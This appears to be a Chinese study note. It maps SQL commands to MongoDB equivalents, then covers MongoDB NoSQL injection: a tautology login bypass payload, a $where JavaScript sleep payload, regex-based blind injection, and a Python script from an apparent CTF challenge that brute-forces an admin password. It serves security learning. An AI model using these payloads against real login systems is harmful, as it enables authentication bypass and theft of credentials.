MongoDB基础
| SQL 概念 | MongoDB 概念 | 说明 |
|---|---|---|
| database | database | 数据库 |
| table | collection | 数据库表/集合 |
| row | document | 数据记录行/文档 |
| column | field | 数据字段/域 |
| index | index | 索引 |
| primary key | primary key | 主键,MongoDB 自动将 _id 字段设置为主键 |
| mysql | MongoDB | 说明 |
|---|---|---|
| create DATABASE_NAME | use DATABASE_NAME | 数据库不存在,则自动创建数据库 |
| use DATABASE_NAME | use DATABASE_NAME | |
| database() | db | |
| show databases | show dbs | 没有数据的数据库无法显示出来 |
| drop database DATABASE_NAME | db.dropDatabase() | |
| create table test | db.createCollection("myNewCollection") | |
| show tables | show collections/show tables | |
| insert into table_name values('','') | db.mycol2.insert({"name" : "菜鸟教程"}) | 没有这个集合会自动创建 |
| drop table table_name | db.mycol2.drop() | |
| select * from table_name | db.users.find() | |
| select * from table_name where age>5 | db.myCollection.find({ age: { $gt: 25 } }) | $gt(>)、$lt(<)、$gte(>=)、$lte(<=)、$eq(=)、$ne(!=) |
| select * from table_name where a>1 and b <1 | db.myCollection.find({$and: [{ age: { $gt: 25 } },{ city: "New York" }]}); | $and、$or、$not、$nor |
| where likes>50 AND (by = '菜鸟教程' OR title = 'MongoDB 教程') | db.col.find({"likes": {$gt:50}, $or: [{"by": "菜鸟教程"},{"title": "MongoDB 教程"}]}) |
联合注入
例:String stringQuery = "{ 'username' : '" + name + "', 'password' : '" + password + "'}";
name=1&password=1 ==> {'username':'1':'password':'1'}
username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: '123456 ==> { 'username': 'admin', $or: [ {}, {'a':'a', password: '' }], $comment: '123456'} 为永真
JavaScript 注入
$where可以执行js代码如查找username等于whoami的数据 db.users.find({ $where: "function(){return(this.username == 'whoami')}" })
让服务器sleep
db.users.find({ $where: "function(){sleep(5000);return(this.username == 'a')}" })
布尔盲注
db.users.find({'username':'admin', 'password':{$regex:'.{32}'}}),password匹配32个除\n任意字符,有回显,匹配31个也有回显
db.users.find({'username':'admin', 'password':{$regex:'.{33}'}}),password匹配33个,不回显
所以password长度为32,
CISCN 2024华中赛区ezjava
import requests
url = "http://127.0.0.1:9999/login"
mylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
proxies = {}
for i in range(32):
for j in mylist:
data = {
"username":"admin","password":"','password':{'$regex':'^"+password+j+".*'},'username':'admin"
}
#','password':{'$regex':'^x.*'},'username':'admin
r = requests.post(url,data=data,proxies=proxies)
if r.text.find("username or password incorrect")==-1:
password+=j
print(password)